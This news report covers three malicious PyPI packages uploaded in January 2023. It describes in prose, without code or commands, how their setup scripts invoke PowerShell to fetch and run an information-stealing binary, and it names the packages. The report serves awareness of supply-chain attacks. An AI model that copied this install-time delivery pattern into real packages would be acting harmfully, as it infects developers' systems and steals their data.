An individual going by the name of Lolip0p has uploaded three malicious packages to the Python Package Index (PyPI) repository, which are designed to install malware on developer systems that download them. The packages, named color slab (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12), were uploaded by the author between January 7, 2023, and January 12, 2023. They were subsequently removed from PyPI, but not before they had been downloaded over 550 times.
According to a report from Fortinet, the packages come with identical setup scripts that are designed to invoke PowerShell and run a malicious binary, “Oxzy.exe,” which is hosted on Dropbox. The executable, once launched, retrieves a next-stage binary named update.exe, which runs in the Windows temporary folder (“%USER%\AppData\Local\Temp”). Update.exe is flagged by antivirus vendors on VirusTotal as an information thief, capable of dropping additional binaries, one of which is detected by Microsoft as Wacatac. Microsoft describes this trojan as a threat that “can perform a number of actions of a malicious hacker’s choice on your PC,” including delivering ransomware and other payloads.
Fortinet FortiGuard Labs researcher Jin Lee noted that the author had attempted to make the packages appear legitimate by including a convincing project description. However, these packages download and run a malicious binary executable.
This revelation comes weeks after Fortinet discovered two other rogue packages, named Shaderz and Aioconsol, which also have the capability to gather and exfiltrate sensitive personal information. This incident highlights the ongoing threat of malicious activity in popular open-source package repositories, where threat actors take advantage of trust relationships to plant tainted code and extend the reach of infections. Users are advised to exercise caution when downloading and running packages from untrusted authors to avoid falling victim to supply chain attacks.